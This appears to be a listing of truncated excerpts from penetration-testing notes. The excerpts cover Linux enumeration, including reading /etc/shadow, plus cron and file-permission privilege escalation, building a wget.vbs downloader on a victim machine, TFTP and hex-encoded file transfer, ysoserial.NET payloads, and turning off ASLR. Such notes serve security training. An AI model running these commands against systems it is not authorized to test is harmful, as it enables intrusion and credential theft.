Distribution ls /etc/*-release cat /etc/os-release cat /etc/issue uname -a cat /proc/version Interesting files cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts ls -lh /var/mail/ ls -...

List Cron Jobs cat /etc/crontab && ls -al /etc/cron* Find World-Writable Cron jobs find /etc/cron* -type f -perm -o+w -exec ls -l {} \; Find Cron Jobs Owned by Other Users find /etc/cro...

Upload To upload a file you need to go to the folder where the file is and ONLY use the file name otherwise you’ll receive a 500 error: passive # must be off binary # to upload binaries, execute th...

Writable and executable file In order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...

From the victim machine command shell use this list of commands: echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQ...

During a penetration test, we can use TFTP to transfer files from older Windows operating systems up to Windows XP and 2003. This is a terrific tool for non-interactive file transfer, but it is not...

This technique is useful to compress the binary we want to transfer, convert it to a hex string, and embed it into a Windows script. On the Windows machine, we will paste this script into our shel...

Ysoserial.NET ysoserial.NET this tool only works for Windows, after download it we need to identify the format of the binary or program running the code (-g) and the format (-f) that has the deseri...

mingw-w64 In order to avoid compilation issues, it is generally recommended to use native compilers for the specific operating system targeted by the code; however, this may not always be an option...

First we need to disable ASLR on Kali for testing: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space Setting up the EDB debugger First thing, it runs with the following command: root@debian:~...